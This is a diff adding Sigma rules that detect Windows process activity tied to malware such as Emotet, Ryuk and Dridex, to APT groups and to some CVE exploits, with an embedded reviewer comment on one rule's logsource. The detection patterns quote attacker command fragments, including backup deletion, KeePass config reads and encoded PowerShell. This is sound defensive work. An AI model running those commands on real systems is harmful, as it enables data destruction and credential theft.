b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml 
@@ -0,0 +1,55 @@ +title: Potential Dridex Activity +id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e +status: stable +description: Detects potential Dridex acitvity via specific process patterns +references: + - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3 + - https://redcanary.com/threat-detection-report/threats/dridex/ +author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) +date: 2019/01/10 +modified: 2023/02/03 +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 + - attack.discovery + - attack.t1135 + - attack.t1033 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_svchost: + CommandLine|contains|all: + - C:\Users\ + - \Desktop\ + NewProcessName|endswith: \svchost.exe + filter_svchost: + ParentProcessName|startswith: C:\Windows\System32\ + selection_regsvr: + CommandLine|contains: + - ' -s ' + - \AppData\Local\Temp\ + ParentProcessName|endswith: \excel.exe + NewProcessName|endswith: \regsvr32.exe + filter_regsvr: + CommandLine|contains: .dll + selection_anomaly_parent: + ParentProcessName|endswith: \svchost.exe + selection_anomaly_child_1: + CommandLine|contains: ' /all' + NewProcessName|endswith: \whoami.exe + selection_anomaly_child_2: + CommandLine|contains: ' view' + NewProcessName|endswith: + - \net.exe + - \net1.exe + condition: process_creation and ((selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*)) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml new file mode 100644 index 000000000..2229c4279 
--- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml @@ -0,0 +1,44 @@ +title: Potential Dtrack RAT Activity +id: f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 +status: stable +description: Detects potential Dtrack RAT activity via specific process patterns +references: + - https://securelist.com/my-name-is-dtrack/93338/ + - https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/ + - https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/ + - https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/ + - https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/ +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +date: 2019/10/30 +modified: 2023/02/03 +tags: + - attack.impact + - attack.t1490 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_ping: + CommandLine|contains|all: + - 'ping -n ' + - ' echo EEEE > ' + selection_ipconfig: + CommandLine|contains|all: + - ipconfig /all + - \temp\res.ip + selection_netsh: + CommandLine|contains|all: + - interface ip show config + - \temp\netsh.res + condition: process_creation and (1 of selection_*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml new file mode 100644 index 000000000..6681a803f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml 
@@ -0,0 +1,51 @@ +title: Potential Emotet Activity +id: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18 +status: stable +description: Detects all Emotet like process executions that are not covered by the more generic rules +references: + - https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/ + - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/ + - https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/ + - https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/ +author: Florian Roth (Nextron Systems) +date: 2019/09/30 +modified: 2023/02/04 +tags: + - attack.execution + - attack.t1059.001 + - attack.defense_evasion + - attack.t1027 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - ' -e* PAA' + - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ # $env:userprofile + - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA # $env:userprofile + - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA # $env:userprofile + - IgAoACcAKgAnACkAOwAkA # "('*');$ + - IAKAAnACoAJwApADsAJA # "('*');$ + - iACgAJwAqACcAKQA7ACQA # "('*');$ + - JABGAGwAeAByAGgAYwBmAGQ + - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA # =$env:temp+( + - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA # =$env:temp+( + - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA # =$env:temp+( + filter: + CommandLine|contains: + - fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ + - wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA + - 8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA + condition: process_creation and (selection and not filter) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: high +ruletype: Sigma 
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml new file mode 100644 index 000000000..26e3547c7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml 
@@ -0,0 +1,57 @@ +title: Formbook Process Creation +id: 032f5fb3-d959-41a5-9263-4173c802dc2b +status: test +description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. +references: + - https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer + - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/ + - https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/ + - https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/ +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +date: 2019/09/30 +modified: 2022/10/06 +tags: + - attack.resource_development + - attack.t1587.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + # Parent command line should not contain a space value + # This avoids false positives not caused by process injection + # e.g. wscript.exe /B sysmon-install.vbs + ParentCommandLine|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + ParentCommandLine|endswith: .exe + selection2: + - CommandLine|contains|all: + - /c + - del + - C:\Users\ + - \AppData\Local\Temp\ + - CommandLine|contains|all: + - /c + - del + - C:\Users\ + - \Desktop\ + - CommandLine|contains|all: + - /C + - type nul > + - C:\Users\ + - \Desktop\ + selection3: + CommandLine|endswith: .exe + condition: process_creation and (all of selection*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma 
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml new file mode 100644 index 000000000..c44323e1a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml @@ -0,0 +1,29 @@ +title: LockerGoga Ransomware Activity +id: 74db3488-fd28-480a-95aa-b7af626de068 +status: stable +description: Detects LockerGoga ransomware activity via specific command line. +references: + - https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a + - https://blog.f-secure.com/analysis-of-lockergoga-ransomware/ + - https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/ +author: Vasiliy Burov, oscd.community +date: 2020/10/18 +modified: 2023/02/03 +tags: + - attack.impact + - attack.t1486 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: -i SM-tgytutrc -s + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml new file mode 100644 index 000000000..12c863c7c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml 
@@ -0,0 +1,39 @@ +title: Potential QBot Activity +id: 4fcac6eb-0287-4090-8eea-2602e4c20040 +status: stable +description: Detects potential QBot activity by looking for process executions used previously by QBot +references: + - https://twitter.com/killamjr/status/1179034907932315648 + - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/ +author: Florian Roth (Nextron Systems) +date: 2019/10/01 +modified: 2023/02/03 +tags: + - attack.execution + - attack.t1059.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + ParentProcessName|endswith: \WinRAR.exe + NewProcessName|endswith: \wscript.exe + selection2: + CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type ' + selection3: + CommandLine|contains|all: + - regsvr32.exe + - C:\ProgramData + - .tmp + condition: process_creation and (1 of selection*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml new file mode 100644 index 000000000..8b10b62ae --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml 
@@ -0,0 +1,56 @@ +title: Potential Ryuk Ransomware Activity +id: c37510b8-2107-4b78-aa32-72f251e7a844 +related: + - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 + type: similar + - id: 0acaad27-9f02-4136-a243-c357202edd74 + type: obsoletes +status: stable +description: Detects Ryuk ransomware activity +references: + - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/ + - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ +author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) +date: 2019/12/16 +modified: 2023/02/03 +tags: + - attack.persistence + - attack.t1547.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_reg: + CommandLine|contains|all: + - Microsoft\Windows\CurrentVersion\Run + - C:\users\Public\ + selection_del: + CommandLine|contains|all: + - del /s /f /q c:\ + - \*.bac + - \*.bak + - \*.bkf + selection_net: + CommandLine|contains|all: + - ' stop ' + - ' /y' + CommandLine|contains: + - samss + - audioendpointbuilder + - unistoresvc_ + - AcrSch2Svc + NewProcessName|endswith: + - \net.exe + - \net1.exe + condition: process_creation and (1 of selection_*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml new file mode 100644 index 000000000..fb36aa973 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml 
@@ -0,0 +1,33 @@ +title: Potential Snatch Ransomware Activity +id: 5325945e-f1f0-406e-97b8-65104d393fff +status: stable +description: Detects specific process characteristics of Snatch ransomware word document droppers +references: + - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ +author: Florian Roth (Nextron Systems) +date: 2020/08/26 +modified: 2023/02/13 +tags: + - attack.execution + - attack.t1204 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - shutdown /r /f /t 00 # Shutdown in safe mode immediately + - net stop SuperBackupMan + condition: process_creation and selection +fields: + - SubjectUserName + - NewProcessName + - ComputerName +falsepositives: + - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml new file mode 100644 index 000000000..48f03fba3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml 
@@ -0,0 +1,31 @@ +title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 +id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0 +status: test +description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local +references: + - https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg +author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +date: 2019/10/02 +modified: 2023/03/29 +tags: + - attack.defense_evasion + - attack.t1218.010 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - regsvr32 + - \AppData\Local\ + - .dll + - ',DllEntry' + condition: process_creation and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml new file mode 100644 index 000000000..bd9f91174 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml 
@@ -0,0 +1,42 @@
+title: APT31 Judgement Panda Activity
+id: 03e2746e-2b31-42f1-ab7a-eb39365b2422
+status: test
+description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
+references:
+ - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
+author: Florian Roth (Nextron Systems)
+date: 2019/02/21
+modified: 2023/03/10
+tags:
+ - attack.lateral_movement
+ - attack.credential_access
+ - attack.g0128
+ - attack.t1003.001
+ - attack.t1560.001
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_ldifde:
+ CommandLine|contains|all:
+ - ldifde
+ - -f -n
+ - eprod.ldf
+ selection_lateral_movement:
+ CommandLine|contains|all:
+ - copy \\\\
+ - c$
+ CommandLine|contains:
+ - \aaaa\procdump64.exe
+ - \aaaa\netsess.exe
+ - \aaaa\7za.exe
+ - \c$\aaaa\
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml
new file mode 100644
index 000000000..cdbd7ffa9
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml
@@ -0,0 +1,35 @@
+title: Potential Russian APT Credential Theft Activity
+id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
+status: stable
+description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
+references:
+ - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
+author: Florian Roth (Nextron Systems)
+date: 2019/02/21
+modified: 2023/03/08
+tags:
+ - attack.credential_access
+ - attack.t1552.001
+ - attack.t1003.003
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_xcopy:
+ CommandLine|contains|all:
+ - xcopy /S /E /C /Q /H \\\\
+ - \sysvol\
+ selection_adexplorer:
+ CommandLine|contains|all:
+ - adexplorer -snapshot "" c:\users\
+ - \downloads\
+ - .snp
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml
new file mode 100644
index 000000000..31eff7409
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml
@@ -0,0 +1,30 @@
+title: Potential EmpireMonkey Activity
+id: 10152a7b-b566-438f-a33c-390b607d1c8d
+status: experimental
+description: Detects potential EmpireMonkey APT activity
+references:
+ - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
+ - https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider
+author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+date: 2019/04/02
+modified: 2023/03/09
+tags:
+ - attack.defense_evasion
+ - attack.t1218.010
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - /e:jscript # This is a guess since the report doesn't mention the method of execution. This assumes that it is achieved via specifying the execution engine
+ - \Local\Temp\Errors.bat
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml
new file mode 100644
index 000000000..2fc96f369
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml
@@ -0,0 +1,32 @@
+title: Equation Group DLL_U Export Function Load
+id: d465d1d8-27a2-4cca-9621-a800f37cf72e
+status: stable
+description: Detects a specific export function name used by one of EquationGroup tools
+references:
+ - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
+ - https://twitter.com/cyb3rops/status/972186477512839170
+author: Florian Roth (Nextron Systems)
+date: 2019/03/04
+modified: 2023/03/09
+tags:
+ - attack.g0020
+ - attack.defense_evasion
+ - attack.t1218.011
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ - CommandLine|contains: -export dll_u
+ - CommandLine|endswith:
+ - ',dll_u'
+ - ' dll_u'
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml
new file mode 100644
index 000000000..8dcd7da61
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml
@@ -0,0 +1,40 @@
+title: Mustang Panda Dropper
+id: 2d87d610-d760-45ee-a7e6-7a6f2a65de00
+status: test
+description: Detects specific process parameters as used by Mustang Panda droppers
+references:
+ - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/
+ - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/
+ - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
+author: Florian Roth (Nextron Systems), oscd.community
+date: 2019/10/30
+modified: 2021/11/27
+tags:
+ - attack.t1587.001
+ - attack.resource_development
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_cli:
+ - CommandLine|contains:
+ - Temp\wtask.exe /create
+ - '%windir:~-3,1%%PUBLIC:~-9,1%'
+ - '/tn "Security Script '
+ - '%windir:~-1,1%'
+ - CommandLine|contains|all:
+ - /E:vbscript
+ - C:\Users\
+ - .txt
+ - /F
+ selection_img:
+ NewProcessName|endswith: Temp\winwsh.exe
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml
new file mode 100644
index 000000000..f5e5a7331
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml
@@ -0,0 +1,48 @@
+title: Operation Wocao Activity
+id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab
+related:
+ - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d
+ type: derived
+status: test
+description: Detects activity mentioned in Operation Wocao report
+references:
+ - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/
+ - https://twitter.com/SBousseaden/status/1207671369963646976
+author: Florian Roth (Nextron Systems), frack113
+date: 2019/12/20
+modified: 2022/10/09
+tags:
+ - attack.discovery
+ - attack.t1012
+ - attack.defense_evasion
+ - attack.t1036.004
+ - attack.t1027
+ - attack.execution
+ - attack.t1053.005
+ - attack.t1059.001
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+ definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ - checkadmin.exe 127.0.0.1 -all
+ - netsh advfirewall firewall add rule name=powershell dir=in
+ - cmd /c powershell.exe -ep bypass -file c:\s.ps1
+ - /tn win32times /f
+ - create win32times binPath=
+ - \c$\windows\system32\devmgr.dll
+ - ' -exec bypass -enc JgAg'
+ - type *keepass\KeePass.config.xml
+ - iie.exe iie.txt
+ - reg query HKEY_CURRENT_USER\Software\\*\PuTTY\Sessions\
+ condition: process_creation and selection
+falsepositives:
+ - Administrators that use checkadmin.exe tool to enumerate local administrators
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml
new file mode 100644
index 000000000..9c204d2d9
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml
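Review bot: The `definition:` line under `logsource:` states that the 'System Security Extension' audit subcategory must be enabled to log EID 4697, but the converted detection keys on `EventID: 4688` in the Security channel and never references 4697, so the stated prerequisite does not describe this rule. It presumably carried over from the upstream rule's logsource block; for this builtin conversion the relevant prerequisite is process-creation auditing with the command line included in 4688, e.g. `definition: 'Requirements: Audit Process Creation enabled and command line included in 4688 events'`. The sibling Security-channel rule in the next hunk keys on EID 4799, so the 4697 reference is not explained there either.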
@@ -0,0 +1,36 @@
+title: Operation Wocao Activity - Security
+id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d
+status: test
+description: Detects activity mentioned in Operation Wocao report
+references:
+ - https://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/
+ - https://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf
+ - https://twitter.com/SBousseaden/status/1207671369963646976
+author: Florian Roth (Nextron Systems), frack113
+date: 2019/12/20
+modified: 2022/11/27
+tags:
+ - attack.discovery
+ - attack.t1012
+ - attack.defense_evasion
+ - attack.t1036.004
+ - attack.t1027
+ - attack.execution
+ - attack.t1053.005
+ - attack.t1059.001
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: security
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID: 4799
+ TargetUserName|startswith: Administr
+ CallerProcessName|endswith: \checkadmin.exe
+ condition: security and selection
+falsepositives:
+ - Administrators that use checkadmin.exe tool to enumerate local administrators
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml
new file mode 100644
index 000000000..243fcc6f3
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml
@@ -0,0 +1,32 @@
+title: CVE-2020-0688 Exploitation via Eventlog
+id: d6266bf5-935e-4661-b477-78772735a7cb
+status: test
+description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
+references:
+ - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/
+ - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/
+author: Florian Roth (Nextron Systems), wagga
+date: 2020/02/29
+modified: 2022/12/25
+tags:
+ - attack.initial_access
+ - attack.t1190
+ - cve.2020.0688
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection1:
+ EventID: 4
+ Provider_Name: MSExchange Control Panel
+ Level: Error
+ selection2:
+ - '&__VIEWSTATE='
+ condition: application and (all of selection*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml
new file mode 100644
index 000000000..c3010eb88
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml
@@ -0,0 +1,43 @@
+title: Exploited CVE-2020-10189 Zoho ManageEngine
+id: 846b866e-2a57-46ee-8e16-85fa92759be7
+status: test
+description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
+references:
+ - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
+ - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
+author: Florian Roth (Nextron Systems)
+date: 2020/03/25
+modified: 2023/01/21
+tags:
+ - attack.initial_access
+ - attack.t1190
+ - attack.execution
+ - attack.t1059.001
+ - attack.t1059.003
+ - attack.s0190
+ - cve.2020.10189
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: DesktopCentral_Server\jre\bin\java.exe
+ NewProcessName|endswith:
+ - \cmd.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - \bitsadmin.exe
+ - \systeminfo.exe
+ - \net.exe
+ - \net1.exe
+ - \reg.exe
+ - \query.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml
new file mode 100644
index 000000000..90104f0f8
--- /dev/null
